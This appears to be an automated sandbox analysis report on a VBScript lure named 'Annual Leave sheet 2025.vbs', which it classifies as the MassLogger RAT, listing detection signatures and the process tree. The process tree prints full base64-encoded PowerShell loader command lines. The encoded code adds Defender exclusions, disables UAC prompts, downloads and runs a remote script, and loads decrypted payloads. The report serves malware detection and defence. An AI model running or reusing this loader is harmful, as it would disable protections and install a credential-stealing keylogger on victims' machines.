Windows Analysis Report
Annual Leave sheet 2025.vbs

Overview

General Information

Sample name: Annual Leave sheet 2025.vbs
Analysis ID: 1596083
MD5: d6afdc37cc7ca3efc5ff4047f5f42383
SHA1: 990d388dcc95d4b8780cb7b0a6f7e42178dfa918
SHA256: 034393b0eb32639588f54d54f300c1898318e0bc92f2227130c9db95ec3cb2b6
Tags: vbs user-abuse_ch

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Register Wscript In Run Key
VBScript performs obfuscated calls to suspicious functions
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: DeviceCredentialDeployment Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5064 cmdline: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6756 cmdline: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 1632 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 5292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 1816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 1276 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3
Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJh
bV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtn
cmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WerFault.exe (PID: 1632 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5044 -ip 5044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7476 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7628 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 8152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7848 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8000 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 3228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 5032 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7376 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4696 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 7880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 3244 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 3380 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5784 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 6056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7892 -s 3388 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7004 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2452 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2684 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdk
x6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLk